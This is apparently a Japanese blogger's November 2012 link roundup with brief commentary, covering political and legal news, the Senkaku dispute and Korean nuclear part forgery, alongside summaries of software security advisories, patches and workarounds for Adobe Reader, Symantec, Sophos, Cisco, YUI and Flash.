しかしシルバー・モデルが与えるもっとも大きく、破壊的な影響は、伝統的な選挙キャンペーンや政治評論はもはや選挙結果に決定的な影響を与えることはないという事実が明らかになってしまうことだ。
》 殺害された英国人、薄氏情報をMI6に提供−愛車ナンバーも「007」 (ウォール・ストリート・ジャーナル日本版, 11/8)。ニール・ヘイウッド氏の件。
》 温家宝首相スキャンダルの激震 政治家・官僚の資産公開の突破口になるか (日経ビジネス, 11/7)
》 プーチン大統領、国防相を解任−スキャンダルか政争か (ウォール・ストリート・ジャーナル日本版, 11/7)。アナトリー・セルジュコフ国防相を解任。
》 第50回 8月21日発表の文科省のプルトニウム調査の件。 (マガジン9「脱ってみる?」, 8/30)
飯舘村の最高値はプルトニウム239と240の濃度で16Bq/m2ではないですか!
(中略)
田村市 10Bq/m2
浪江町 13Bq/m2
塙町 16Bq/m2
南相馬市 19Bq/m2
このあたりが非常に高い値です。
そして、こんな重要な情報なのに、地名ではなく、緯度と経度しか情報が無いんですよね…。どうしてー!! 不親切! いいですよ、調べるもん。ま、どうして地名表示をしなかったかも、文科省さまにお聞きしてみましょう。
》 「地方公共団体における情報システムセキュリティ要求仕様モデルプラン(Webアプリケーション)」を一般公開しました (LASDEC, 10/22)
》 新たなるネットワークビジネスの罠 (It probably will go with Torrent -Whity- Torrentで逝こう(白), 11/6)。 携帯電話をわざと落としてカモをハンティングする話。 なかむらさん情報ありがとうございます。
》 平成24年上半期におけるインターネット・ホットラインセンターからの通報による違法情報の検挙状況等について (警察庁, 10/11)
》 平成24年上半期の「インターネット・ホットラインセンター」の運用状況について (警察庁, 10/11)
》 石野卓球「おせーよ!」 小室哲哉「SME頑張って!」 iTunesでソニー邦楽“解禁” (ITmedia, 11/7)
》 渡辺恒雄・読売新聞会長兼主筆が運転免許を不正更新 (週刊文春, 11/7)
渡辺氏は2004年当時、運転免許の更新に際し、70歳以上に義務付けられた3時間の高齢者講習を、視力検査などわずかな検査項目のみで、約10分で終了していた。当時の広報部長(現・東京本社常務取締役総務局長)から「面倒くさい手続きを省いてほしい」と依頼されたキャップが、それを認めてくれる自動車教習所を探し、講習当日も随行していた。また、その過程で、当時の警視庁交通部交通総務課長(現・生活安全部長)がキャップの相談を受け、警視総監から「できる限りのことはやってやれ」と指示を受けていたこともキャップの日記には記されている。
ズブズブの関係。
偽造部品供給で霊光原発2基が稼働停止=韓国 (中央日報, 11/5)
洪長官は、ある原発部品供給会社が03年から今年まで10年間にわたり237品目・7682製品を、外国機関が発給する品質保証書を偽造しながら韓国水力原子力に供給してきた、と明らかにした。
(中略)
未検証部品は霊光3・4・5・6号機と蔚珍3号機に納品されて使用され、主に霊光5・6号機に集中的に納品されたという。これを受け、韓国水力原子力は霊光5・6号機に対する徹底的な安全検証が必要だとみて、今日から稼働を停止することにした。
2002 年の東電原発トラブル隠し事件発覚を思い出した……
部品の品質保証書偽造を10年間見抜けなかった韓国の原発 (朝鮮日報, 11/6)
問題になった部品は、ヒューズやスイッチなど、一般産業用として主に使用されるものだ。米国や欧州など海外で生産された製品を輸入する業者が「原発の部品としても使用できる」という製品認証機関の品質保証書を偽造したというわけだ。(中略) 偽造された書類は、正規の製品を導入する際の書類と比べて、明らかに違いが分かるほどだったという。
担当者が製品認証機関に問い合わせるだけでも突き止められたはずだが、10年もの間、点検のためのシステムは機能しなかった。このため、内部の職員と共謀した可能性も取り沙汰されている。知識経済部や韓水原側は、残る11の認証機関による保証書についても調査に着手した。
【社説】今後も韓水原に原発の管理を任せてよいのか (朝鮮日報, 11/6)
原発部品保証書偽造、検察が本格捜査 霊光原発周辺地域の団体、原発の閉鎖求める (朝鮮日報, 11/7)
【社説】安い電気料金では電力危機の根本解決できず (朝鮮日報, 11/8)
》 Removing Malware from a WordPress blog (StopTheHacker, 11/7)、 How to discover and remove malicious redirects in the .htaccess file (StopTheHacker, 11/5)
》 東電OL殺人事件と陸山会政治資金規正法事件に共通する構図 (郷原信郎が斬る, 11/5)
ということは、この事件では、控訴審裁判部が再勾留を認めた段階で、身柄拘束についての判断という、本来は、有罪無罪の判断とは異なる事項についての判断を示した段階で、事実上、逆転有罪が確実になっていたと言わざるを得ないのである。
では、その再勾留の判断は、控訴審としての最終的な判断を先取りして行えるほど、十分な審理に基づいて行われたものであろうか。その時点というのは、一審の無罪判決が出て、検察が控訴した後、控訴審の審理が始まる前である。検察の控訴趣意書提出までには通常2か月はかかるので、まだ、一審判決のどこにどのような問題があるのか、についての検察官の主張すら明確になっていない。証拠関係は、無罪という裁判所の判断が出た一審と全く変わらないのである。それなのに、その時点で、同じ証拠関係に基づいて、無罪という一審の判断を覆し、有罪の判断を行うことを、事実上決めてしまったというのが、この時の控訴審裁判部なのである。
陸山会事件でも、もともと捜査の主題となっていたのは、この水谷建設からのヤミ献金の事件だった。マスコミでもその疑惑が大々的に報道され、検察の捜査の労力と時間の大半がこのヤミ献金の捜査のために費やされた。しかし、結局、このヤミ献金についての政治資金規正法違反事件の証拠は固まらず、検察は立件を断念、世田谷の不動産の取得に絡む4億円の虚偽記入だけで石川氏を起訴したのである。
その石川氏らの公判で水谷建設からのヤミ献金の事実を、虚偽記入の動機・背景として立証しようとするのは、Aの公判で、前記の1事実の殺人の背景として2の殺人未遂事件を立証しようとするのと同じことである。
本来であれば、そのような証人尋問請求は、裁判所の判断としては絶対に認める余地はなかったはずだ。しかし、東京地裁は、検察官が強く求めたこの証人尋問請求を最終的に認めてしまった。つまり、水谷建設のヤミ献金と4億円の虚偽記入とが関連性があるという判断を、その時点で行った。
》 アマゾンジャパンからの回答について (日本出版者協議会, 11/6)
文書はアマゾンジャパン株式会社・渡部一文メディア事業部門長名で、申入書の1、2に具体的に触れることなく、「申入書記載の事項に関して、弊サイトとしては個別の契約内容に関して貴会に対しご回答する立場にはないと考えておりますので、何卒ご理解賜りたく宜しくお願いいたします。」との内容。出版協が具体的に申し入れた2点について回答になっておらず、まったく誠意が感じられないものである。
アマゾンが公表、宣伝、実施している自社のサービスについて説明をするのが常識である。当会の会員はほぼすべてが取次店を通じアマゾンジャパンと再販売価格維持契約を結んでおり、アマゾンの「Amazon Student」プログラムの10%ポイント還元特典が値引きであり、再販売価格維持契約違反ではないかとの質問には回答義務があるにもかかわらず、回答そのものを拒否するという、門前払いの内容で不誠実きわまりないものであった。
》 原発作業員が去っていく 福島第一原発“廃炉”の現実 (NHK クローズアップ現代, 11/5)。ふくいちだけでなく、老朽原発の廃炉がこれからどんどん増える。中長期的に作業員・技術者が不足しそうな現実。
》 Q3 2012モバイル脅威報告を公開! (エフセキュアブログ, 11/5)。他社のと見比べると興味深い。
調査捕鯨費、実は赤字の穴埋め 復興予算問題 (朝日, 10/24)
調査捕鯨:解体した鯨肉を直接販売へ 事業の収益改善で (毎日, 11/6)。誰も買わないという事実。
捕獲した鯨の肉は食用に販売することが認められている。しかし、供給量が少ないため、店頭価格が100グラム300〜500円程度と「和牛の中級並み」(関係者)に高騰。一部の料亭などで料理として出されているものの、消費者の間では鯨肉離れが進んだ。
牛の方が旨いしね。
南極調査捕鯨、一転実施へ 農水相方針、与野党反対で (朝日, 11/6)。「捕鯨推進を訴える自民党の捕鯨議連が猛反発」ですか。 捕鯨ムラですな。 自民党はあいかわらずこんなのばっかなのか。
Adobe Reader X / XI に 0-day 欠陥があり、既にカスタムバージョンの Blackhole Exploit Kit に組み込まれているという話。Adobe はまだ確認できていない模様。
Foxit Reader や PDF-XChange Viewer、Google Chrome の内蔵 PDF ビューアなど、他の PDF ビューアを利用することで回避できる。
Adobe Reader X/XIのゼロデイ脆弱性を突くPDFエクスプロイトが出現 闇市場で3万〜5万ドルで売られ、銀行顧客を狙った標的型攻撃に使われているとの報告 (ComputerWorld.jp, 2012.11.09)
このエクスプロイトを使ったGoogle Chrome経由での攻撃は失敗するとのことだ。同氏によると、Chromeは、Adobe Readerコンポーネントの保護機能を提供しているという。
2012-11-13 Adobe Reader のサンドボックス機構を迂回するゼロデイ脆弱性 (FFRI BLOG, 2012.11.13)
“Adobe Reader” のセキュリティ機能「サンドボックス」を回避するゼロデイ脆弱性にご用心 (トレンドマイクロ セキュリティ blog, 2012.11.27)
問題の脆弱性の詳細が入手できないことから、トレンドマイクロでは、以下のセキュリティ対策を講じることをお勧めします。
トレンドマイクロだけでなく、他のセキュリティベンダーからも、確認できたという情報がないんだよね……。うーむ。
QuickTime 7.7.3 登場。Windows 版では 9 件のセキュリティ欠陥が修正されている。
関連:
Apple QuickTimeのTeXMLファイルの処理の不備により任意のコードが実行される脆弱性 (CVE-2012-3752)に関する検証レポート (NTTデータ先端技術, 2012.11.27)
QuickTimeの脆弱性を悪用するコード公開〜今すぐアップデートを (so-net セキュリティ通信, 2012.11.28)
この件:
JVNVU#985625: 複数の Symantec 製品に脆弱性 (JVN, 2012.11.06)。Symantec Endpoint Protection 11 および Symantec Scan Engine 5.2 における CAB アーカイブの扱いに欠陥。攻略 CAB ファイルによって任意のコードを実行できるため、local SYSTEM 権限を奪取できる。 CVE-2012-4953
patch はまだない。
最新の Symantec Endpoint Protection (SEP) 12 12.1 および Symantec Protection Engine for Cloud Services 7 にはこの欠陥はない。
Vulnerability Note VU#985625: Symantec Antivirus products fail to properly handle CAB files (US-CERT, 2012.11.05)
……シマンテックからアドバイザリ出ました: SYM12-017: セキュリティ アドバイザリー - シマンテックの旧バージョンの Decomposer (圧縮解凍エンジン) に CAB ファイルの問題 (シマンテック, 2012.11.07)。 SEP 12.0 ではなく SEP 12.1 へのアップグレードが推奨されている。また CAB ファイルのスキャンを無効にすることで回避できる。
アドバイザリがたびたび改訂されてます。また対応・回避策が SYM12-017 シマンテックの旧バージョンの Decomposer (圧縮解凍エンジン) に CAB ファイルの問題についてにまとめられています。らのゆきさん情報ありがとうございます。対応・回避策:
SEP 12.1 にアップグレードする
SEP 11.0 RU5 〜 11.0.7 MP3 にアップグレードし、 SYM12_017_Fixtool.exe を適用する。 SYM12-017 シマンテックの旧バージョンの Decomposer (圧縮解凍エンジン) に CAB ファイルの問題について から入手できる。
CAB ファイルのスキャンが無効になるよう設定する。 SYM12-017 シマンテックの旧バージョンの Decomposer (圧縮解凍エンジン) に CAB ファイルの問題について から入手できる。
Symantec セキュリティアドバイザリー SYM12-017 LiveUpdate パッチについて (シマンテック, 2012.11.29)。SEP 11.x および 12.0 用の修正が 2012.11.29 から LiveUpdate で配布されたそうです。らのゆきさん情報ありがとうございます。
さっそく 12.11 が出たみたい: Tired of 12.10 already?
(Opera, 2012.11.07) snapshot だった。
Cisco Secure Access Control System TACACS+ Authentication Bypass Vulnerability (Cisco, 2012.11.07)。Cisco Secure ACS 5.0〜5.3 に欠陥。5.4 にはこの欠陥はない。
Cisco Prime Data Center Network Manager Remote Command Execution Vulnerability (Cisco, 2012.10.31)
YUI Security Bulletin: Addressing a Vulnerability in YUI 2.4.0 through YUI 2.9.0 (YUI, 2012.10.30)。YUI 2.4.0 〜 2.9.0 の複数の .swf ファイルに XSS 欠陥があり、JavaScript インジェクションが可能。ただし、YUI 2 を CDN 環境で運用している場合にはこの欠陥の影響を受けない。また YUI 3 にはこの欠陥はない。
次のいずれかの方法で対応できる。
YUI 2 の .swf ファイルを削除する。
修正版ファイルが用意されているので、入れかえる。
CDN 環境に移行する。
関連: Post Mortem: SWF Vulnerability in YUI 2 (YUI, 2012.11.05)
Plone releases fixes for 24 vulnerabilities (H Security, 2012.11.06)、 Security vulnerability: 20121106 - Multiple vectors (Plone, 2012.11.07)。
「IrfanView」用プラグイン「IrfanView PlugIns」に“Highly critical”の脆弱性 プラグインに含まれる“FPX/FlashPix PlugIn”の更新版が単独で公開 (窓の杜, 2012.04.17)。 CVE-2012-0278。 IrfanView PlugIns の PlugIns updated after the version 4.33 に更新版がある。
》 米大統領選の結果を報じる7日の毎日新聞夕刊、その紙面のいたるところにあの男が…作者のさいとう・たかをさんと、岸井成格・毎日新聞主筆との対談も収録しています。ぜひお読みください! #ゴルゴ13 #毎日新聞 pic.twitter.com/xGnPzKlN (毎日, 11/7)
》 総務省、手引書「一般利用者が安心して無線LANを利用するために」公開 (so-net セキュリティ通信, 11/6)
》 JPNICとJPRS、ITU規則改正に意見提出「ネットの成長を阻害しないよう配慮を」 (Internet Watch, 11/6)
》 日米共同統合演習 滋賀県の共同訓練に「忍者」登場 (FNN, 11/5)
滋賀県で行われている自衛隊とアメリカ陸軍の共同訓練に、日本の「忍者」が登場した。
お。海兵隊ではなく、US 陸軍なんだ。
普段見ることができない伊賀流の火薬術などに、集まった兵士たちは、すっかり魅了されたようだった。 (中略) 今回の忍術の実演は、日本文化の交流事業の一環として、アメリカ陸軍からの熱い要望を受けて実現したという。
US の人はみんなニンジャ好きだからなあ。
月刊 Flash Player / AIR、今月の更新は……
11.5.502.110 for Windows / Mac
11.2.202.251 for Linux
11.5.31.2 for Google Chrome (Chrome 23.0.1271.64)
11.3.376.12 for IE 10 (セキュリティ アドバイザリ 2755801)
11.1.115.27 for Android 4.x
11.1.111.24 for Android 3.x and 2.x
AIR 3.5.0.600
任意のコードの実行を招く欠陥 7 つが修正されている。全て Google Security Team から。 CVE-2012-5274 CVE-2012-5275 CVE-2012-5276 CVE-2012-5277 CVE-2012-5278 CVE-2012-5279 CVE-2012-5280
抄訳版: APSB12-24: Adobe Flash Player に関するセキュリティアップデート公開 (Adobe)
Google Chrome 23.0.1271.64 公開。14 件のセキュリティ欠陥が修正され、Flash も更新されている。 Chrome 23 の機能追加についてはこちら: Longer battery life and easier website permissions (Google, 2012.11.06)
Opera 12.10 公開。Windows 8 / Mac OS X 10.8 + Retina ディスプレイ対応などの他、セキュリティ欠陥も 6 件修正されている。
さっそく 12.11 が出たみたい: Tired of 12.10 already?
(Opera, 2012.11.07) snapshot だった。
》 情報収集のお願い: 2012/11/ 2 追記 (INASOFT)。個人的には「誤認逮捕の恐怖」と煽ってもらっても全然 ok なのですが (実際恐怖です)、トレンドマイクロ製品を使ったところで「誤認逮捕の恐怖」からは逃れられないわけで……。
ところで、ユーザーの方に教わって、Twitter上を「トレンドマイクロ」で検索してみてわかったのですが、トレンドマイクロ社の出しているアプリに対して批判がすごい勢いで行われていました。
そもそもの発端は、トレンドマイクロの人がNewsZEROに出演した際、「アンドロイドは北極のようなもの。普段着で行くと死ぬ」と発言したのだそうですが、そもそもウイルスバスターのAndroid版をインストールするためには、Androidのセキュリティを弱めてやる必要があるそうで(というか公式配信アプリとは認められていないんだそうで)、やっていることと、言っていることが矛盾している、と。結果、セキュリティの専門家からは「トレンドマイクロが「アンドロイドは北極のようなもの。普段着で行くと死ぬ」とのコメントですか。自社製品のために提供元不明のアプリインストールを許可させるってことは「北極で普段着すら脱がせるようなこと」をしているとボクは思いますよ。」と批判が寄せられ、大量のリツイートが行われているという状況でした。
このほかに、トレンドマイクロがバッテリーを長持ちさせるアプリ「バッテリーエイド」を出しているが、(略) いかがわしい (略) 各Permissionがなぜ必要かの説明が一切ない上、各アプリの使用履歴などを送信するのかしないのかも不明。なぜセキュリティ会社が、「電池長持ち」のようなアプリを出すのか。と非難されていたり、なんか大変なことになっておりました。
関連: 情報を流出する不正スマホアプリの実態とは? 〜国内スマホアプリの実態:第一弾〜 (トレンドマイクロ セキュリティ blog, 10/31)。ここで紹介されている「ウイルスバスター モバイル for Android」も、ふつうにたどると独自サイト配布版になっちゃいますね。 今ではGoogle Play でも配布されてるんですが、今だに独自サイト版の方が主になっているようで。
》 11月5日 Guy Fawkes Night とアノニマス #Nov5 #5Nov (エフセキュアブログ, 11/5)、 PayPal, Symantec hacked as Anonymous begins November 5 hacking spree (ZDNet, 11/5)
》 第9回東北情報セキュリティ勉強会。 2012.12.01、宮城県仙台市、一般 1,000円、学生・未成年無料。
》 電話帳を抜き取るAndroidアプリに注意、1千万件以上のデータ流出 (so-net セキュリティ通信, 11/1)
》 10月の国内フィッシング事情:ネットバンキングは新たな手口に移行か (so-net セキュリティ通信, 11/5)
》 国内著名ネットバンク利用者を狙った Man-in-the-Browser 攻撃か。前ねた。
オンラインバンキングの取引にご注意を!! (エフセキュアブログ, 11/2)
10月末から確認されているオンラインバンキング等を対象にした不正送金・出金事件をまとめてみた。 (piyolog, 11/2)
ネットバンク不正 別に複数の出入金記録 愛知の口座、仲介「拠点」か (産経, 11/4)。明らかになっていない被害が存在する可能性。
“パスワード盗み取る”共通ウイルス検出 (NHK, 11/4)
このウイルスは、ウイルス対策ソフト会社の「カスペルスキー」と「マカフィー」、それに「シマンテック」のソフトでは駆除できるようになっているということで、
インターネットバンキング利用者の金融情報の入力を求める不正画面を表示するとみられるウイルスの検出対応について (トレンドマイクロ, 11/5)。たいへんですね。 しかしなぜ検出名を書かないのだろう。
インターネットバンキング利用者等の個人情報を狙った新たな手口の事案に対する対策について (警察庁, 11/6)
》 誤認逮捕:銃刀法除外規定気付かず8時間不当拘束…警視庁 (毎日, 11/3)
同署は刃渡りの規定がない軽犯罪法違反(凶器携帯)容疑で男性を改めて任意で調べ、書類送検する方針という。
なんじゃそりゃあ……。ノルマ消化したいだけだろ。
特集ワイド:パソコン遠隔操作事件、誤認逮捕次々 虚偽自白からの護身術 (毎日, 11/6)
逮捕された本人にできることはあるのか。秋山弁護士は「逮捕されたらすぐに当番弁護士を呼ぶこと」を挙げる。「警察は逮捕した容疑者に対し、弁護人選任権と黙秘権があることを告げる義務がある。逮捕されると同時に『当番弁護士を呼んで』と言っていい。犯行は身に覚えがないことを主張した後は『取り調べは弁護士と相談してから』と黙秘する方法もあります。当番弁護士は早ければその日のうちに、遅くとも次の日には駆けつけてくれます」
当番弁護士に相談し、IT事件などそれぞれの分野に強い弁護士を探してもらえる場合もあるという。
碓井教授は「逮捕直後は動揺し、正常な判断ができないことも多い。重大な決定は一人でせず、弁護士など誰かと相談し、時間をかけることが大切だ」と助言する。また「ストレス回避が難しい環境に長期間置かれた人は、学習性無力感といって、そこから逃れる努力すらできなくなる。誤認逮捕された人にとって一番危険なのは孤独感。家族や支援者が『必ず助ける。信じて待て』と弁護士を通してメッセージを送るなど、絶望させないことも大切」という。
今回、19歳の男性は約1カ月半、大阪府と福岡市の男性も1カ月近く勾留されている。もし自分だったら、自白せずにいられただろうか−−到底自信がない。
関連: 落合弁護士のコメント
これは酷すぎる!警察・検察の「反省」なんてみんなウソっぱちだった ネットなりすまし殺人予告 誤認逮捕の被害者が「恐怖の取調室」を語った (現代ビジネス, 11/6)
三重県警の捜査は粛々と進んだ。その背景を、全国紙社会部記者が解説する。
「'08年の秋葉原事件後、警察庁が全国の県警に通達した『サイバーテロ予告の捜査マニュアル』があります。詳しい内容は開示されていませんが、そこには『脅迫メールの書き込みが行われたパソコンのIPアドレスを根拠に、被疑者を逮捕してもよい。被疑者否認のまま起訴しても、公判は維持できる』という旨が明記されているんです。
警察がもっとも気にするのは『公判維持できるか』、つまり『裁判で醜態をさらさないか』という点。その部分が警察庁に担保されている以上、怖いものはありません。IPアドレスの一致するパソコンの持ち主を、即逮捕する。
今回の事件で、これまでの捜査マニュアルがいかに安易で時代遅れなものだったかが白日の下に晒されることになりました」
顎が外れた。
PC遠隔操作ウイルス事件が社会に突きつけた「課題」 【第2回】手口から考察する犯人像 (ComputerWorld.jp, 11/6)
》 コミュニティサイトに起因する児童被害の事犯に係る調査結果について(平成24年上半期) (警察庁, 11/5)
Sophos Anti-Virus に複数の重大な欠陥。
さらに最近 Ormandy 氏は、Sophos Anti-Virus のエンジンを停止させる、特別に細工されたファイルのサンプルを提供されました。
- Visual Basic 6 コントロールの解析の整数オーバーフロー
- sophos_detoured_x64.dll ASLR の回避
- ソフォス製品による、Internet Explorer の保護モードの無効化
- ユニバーサル XSS
- Microsoft CAB パーサのメモリ破損に関する脆弱性
- RAR 仮想マシン標準フィルタのメモリ破損
- ネットワークアップデートサービス経由の特権の昇格
- スタックバッファオーバーフローによる PDF ファイルの復号化
多くは最新配付版で既に修正されているが、「さらに最近」の DoS 攻撃可能な欠陥については 2012.11.28 に修正されるそうだ。 また「ネットワークアップデートサービス経由の特権の昇格」だけ「修正版の配布の完了日: 2012年 5月 8日」と、Ormandy 氏が Sophos に指摘した日 (2011.09.10) よりも前であり、指摘前に既に修正されていたみたい。関連:
[Full-disclosure] multiple critical vulnerabilities in sophos products (Tavis Ormandy, 2012.11.05)
Sophail: Applied attacks against Sophos Antivirus (Tavis Ormandy)。タイムラインも記載されている。
Sophos products and Tavis Ormandy (Sophos, 2012.11.05)。「ネットワークアップデートサービス経由の特権の昇格」の件は記載されていない。
JVNVU#662243: Sophos Antivirus に複数の脆弱性 (JVN, 2012.11.06)
ピックアップ@アジア 「尖閣問題のゆくえ〜中国海軍の関与は?」 (NHK 解説委員室, 10/31)
南西諸島から台湾、フィリピンへと続く島々のラインは「第一列島線」と呼ばれています。
中国海軍が太平洋に進出するためには、この列島線を突破しなければなりません。つまり、この線は、日本にとって対中国の重要な防衛ラインなのです。万一、尖閣諸島が中国側にわたることになると、この防衛ラインにくさびを打ち込まれることを意味します。こうしたところにも、中国の狙いがあるのではないかと思います。
〈現在まで〉1992年、中国が領海法で明文化 (朝日, 10/31)
木語:「盗んだ」と逆噴射=金子秀敏 (毎日, 10/4)
木語:中韓露の足並み=金子秀敏 (毎日, 10/11)
8月20日、モスクワ発の新華社電が気になる。中国政府の外交政策責任者、戴秉国(たいへいこく)・国務委員がロシアのパトルシェフ安全保障会議書記と戦略安全保障協議を行ったという。
中国側は「主権や領土の一体性、安全保障を巡る問題で互いに支持すべきだ」と述べた。ロシアがこれに応じたかどうかは不明だが、サンフランシスコ条約にはロシア(当時はソ連)も署名していない。だから中国、韓国、ロシア、それに台湾(中華民国)が対日領土問題で共同歩調を取ることは論理的にありうる。
中国の外相演説に「盗んだとはなんだ」と反発する前に、中国、韓国、ロシアが領土問題で共同歩調をとらないような知恵をしぼらなければならない。
木語:ツキジデスの尖閣=金子秀敏 (毎日, 10/18)
「ツキジデスのわな」という議論を見かける。台頭する中国と超大国・米国が戦争を始めるというからおだやかではない。最近では米国の政治学者、グレアム・アリソン氏の文章がフィナンシャル・タイムズ紙に載った。
これ: "Avoiding Thucydides's Trap" (Financial Times / Harvard, 8/22)。「トゥキディデス」という表記の方が一般的なのかな。
木語:尖閣にレッドライン=金子秀敏 (毎日, 10/25)
台頭する新興中国と覇者(はしゃ)・米国はやがて戦争に至るという前回の「太平洋におけるツキジデスのわな」に、回避の方法があるだろうか。
米国の政治学者、グレアム・アリソン氏は、米国が中国に対して「レッドライン」を明確に示すことにより回避できるという。レッドラインとは、この一線を越えたら必ず武力を発動するという軍事境界線である。
(中略)
国防長官は「センカクには日米安保条約第5条が適用される」と述べたという。尖閣がレッドラインだと明確にしたのだ。その後、デモはおさまった。 (中略)
米国務省高官は「日米安保第5条適用」と言うときに「米国のナショナルインタレスト」と付け加える。レッドラインとは「米国のナショナルインタレストのある場所」だ。第5条は、日本の領土防衛というより、米国のナショナルインタレストだから適用されるのである。
自衛隊と米軍 共同演習始まる (NHK, 11/5)
演習では、当初、沖縄の離島で日米共同の上陸訓練を検討していましたが、日中間のあつれきを必要以上に高めることは好ましくないなどとして、離島への上陸は取りやめ、洋上での訓練に切り替えました。
また、前回、2年前の演習では、日米双方がイージス艦や戦闘機の訓練などを積極的に公開しましたが、今回は一切公開しないとしています。
尖閣諸島問題巡り日中局長級協議 (NHK, 11/5)
》 ハリケーン「サンディ」で、ソーシャルメディアで広がった「デマ」と、その対策(※NHKの記事は変です) (NAVER まとめ, 11/5) (魚拓 page1、 page2、 page3 )。ミイラ取りがミイラに……。
》 ビンラディン殺害作戦を描いた映画「ゼロ・ダーク・サーティ」予告編ムービー (gigazine, 8/8)。日本語字幕入り予告編へのリンクが追加されました。 監督は「ハート・ロッカー」のキャスリン・ビグロー。
》 「沖縄米兵の性暴力事件 1972年以降7件」 NHK誤り認める (日本報道検証機構, 11/5)
》 懲りないグリーの悪辣「パッケージガチャ」 コンプガチャの後継機能は更に「タチ悪」。パクリ体質も相変わらず健在で、業界の首を絞める盟主に未来はあるか。 (FACTA, 2012.11)
》 トムラウシ山遭難事故のアミューズトラベル、今度は万里の長城で死亡事故
アミューズトラベル。503 になってます。
トムラウシ山遭難事故に関してのお詫び (アミューズトラベル / Google キャッシュ)
万里の長城遭難:52年ぶり大雪 日本人2人死亡1人不明 (毎日, 11/5)、 写真
万里の長城遭難:「大雪想定せず」簡易な防寒装備のみ (毎日, 11/5)。「またか」。
万里の長城遭難:ツアー会社、09年北海道で8人死亡事故 (毎日, 11/5)
万里の長城遭難:降雪予報、ツアー決行に疑問 (毎日, 11/5)
生存者“本当にすごい雪だった” (NHK, 11/5)
》 ピックアップ@アジア 「アゼルバイジャン最新事情」 (NHK 解説委員室, 10/29)。石油輸出に続いて天然ガス輸出へ。
来年には(中略)アゼルバイジャンからヨーロッパに供給されるガスの輸送ルートが決定されるということです。
それはトルクメニスタンやカザフスタンという他のカスピ海沿岸諸国のヨーロッパへのガス輸送の可能性を高めるのです。
(中略)
アゼルバイジャンはロシアとは異なり、ヨーロッパのエネルギー憲章に調印しています。そして他のガス生産国が天然ガスを輸送したいと申し出れば、アゼルバイジャンはそのガスを輸送する義務があるのです。バクーからヨーロッパへのパイプラインが完成すれば、EUは今後トルクメニスタンと交渉して、カスピ海の底を通るトランスカスピパイプラインの実現に向けて動くでしょう。
へぇ……
》 除染手当、作業員に渡らず 業者が「中抜き」か 福島 (朝日, 11/5)。日常。
》 『海江田ノート』 原発との闘争176日の記録 (講談社, 11/2)。ようやく出たようで。関連:
一っ風呂浴びに帰宅していた班目春樹・原子力安全委員長と突然の東京電力爆破予告/ スクープ公開! 『海江田ノート』原発事故との闘い (現代ビジネス, 3/16)。FRIDAY の記事。
関係者が恐れる「海江田原発メモ」 (東スポ, 5/21)
海江田本は7月に講談社から「『海江田ノート』原発との闘争176日の記録(仮)」とのタイトルで発売予定。
当初は 7 月予定だったのだが……
海江田万里氏の「原発暴露本」の出版が延びに延びたマヌケな理由…の巻 (芸能ポンコツ博覧会★ザビ家の栄光, 9/24)
当初の予定では7月中旬の発売だったが、9月上旬に変更。
現在では10月中旬まで延びている。
しかし 10 月中旬も間にあわず、今月ようやく出た。
まぁしかし、遅れたことと中身とは違うので…… (他人事じゃない)
》 アップル、メキシコでの“iPhone”の名称を巡る裁判で敗訴 メキシコのITソリューション企業が“iFone”を2003年に登録済み (ComputerWorld.jp, 11/5)。アイホンみたいな問題、メキシコにもあったのか。 Apple は、アイホンの時のように、とっとと和解しなさい。
》 GhostShell releases 2.5 million Russian government accounts (ZDNet, 11/2)
》 Hacker leaks VMware ESX kernel source code online (ZDNet, 11/4)、 ヴイエムウェア、「ESX」ソースコードの流出を確認——最新の更新とパッチ適用を推奨 (ComputerWorld.jp, 11/6)
》 くらし☆解説 「インフルエンザに備えよう」 (NHK 解説委員室, 11/2)
》 大財閥を夢みた企業家の挫折−−熊津グループの経営破綻 (IDE-JETRO, 10/22)
》 APIに著作権を認めてはならない−EFFが連邦判事を説得するための事例談を一般から募集 (techcrunch, 11/3)
》 ニュージャージー州、ハリケーンの影響を考慮してメールおよびファックスでの投票を許可 (techcrunch, 11/5)。エ、エェッ?!
》 yumで速いミラーサーバーを指定する方法 (ftp-adminの憂鬱, 11/3)。仕事で複数台使うのなら、ローカルミラー立ててそれ使った方がいいと思いますけどね。
》 パスワードなしで他人のFacebookアカウントにアクセスできる問題が発覚 (slashdot.jp, 11/4)。まあ Facebook だから……。
》 Megauploadが新サイト「Mega」として来年復活予定。ドメイン取得済み (slashdot.jp, 11/4)。予想どおり、いきなりラピュタねたにされてます。
》 テレビ史上初、航空機を墜落させてみた! ついに明かされる安全なエリアとは (マイナビニュース, 11/4)。ホンモノの B-727 を墜落させる実験。
番組では、そのデータを得ることにより、航空機の安全性を高めることを目的に、ジェット旅客機「ボーイング727」を、メキシコのソノラ砂漠に墜落させるクラッシュテストを行った。この企画のために、米国防省のミサイル計画従事者や元米海軍特殊部隊出身者などを含む400名の国際チームを結成。4年の歳月と数億円の費用をかけようやく実現に至った。
たった数億円でできるものなんだ……。もっとかかるのかと思った。 (人件費はほとんどボランティアなんだろうけど)
機内には正確なデータを得るために、32カ所のセンサーが付いた、1体約120万円のダミー人形を用意。各パーツごとに精巧に作られているため、どこに衝撃を受けたかを読み取ることができる。実験の結果、死亡する確率が最も高い座席は機種部分(パイロットルームと前から7列目まで)で、生き残る可能性がある座席は最後列から5列目まで。緊急着陸時の姿勢としてはいずれも怪我は免れないものの、現在、世界の航空会社が推奨している「頭を守り衝撃に備える姿勢」が最も効果的と判断された。
やっぱ、基本的には前の方がヤバくて後ろの方がより安全な模様。
》 “パスワード盗み取る”共通ウイルス検出 (NHK, 11/4)。ネットバンク狙いの奴の件。 検出名を明記してくれないとわけわかんないんですけど……。
(1)「巨悪ありき」で自滅 (産経, 10/22)
(2)独自捜査で失敗したら…不祥事、検察改革が言い訳に (産経, 10/23)
(3)情報共有の「伝統」途絶え…決裁劣化で機能せず (産経, 10/24)
前田が言及した捜査会議は、大阪地検特捜部の良き「伝統」でもあった。特捜部長を務めた弁護士、大塚清明(67)は語る。
「取り調べから戻った検事らが毎晩のように部長室に集まり、情報を共有しながら意見を言い合う。筋書きもどんどん修正した」
その伝統が郵便不正事件の捜査で途絶えていたことに驚く特捜OBは多い。
一方、上層部が情報を独占し、下に指示を与えるスタイルは東京地検特捜部の捜査手法に近い。
(4)肥大化したおごり…真相に迫る「魂」喪失 (産経, 10/25)
「検察は国民の負託を受けた正義の集団だ。何をしても許されるんだ」
大阪府枚方市発注の清掃工場建設工事をめぐる談合事件。平成19年7月、大阪地検特捜部に談合容疑で逮捕された元市長、中司(なかつか)宏(56)=1、2審有罪、上告=は取り調べ中、検事から高圧的に告げられた。
(中略)
中司は恐怖を覚えた。
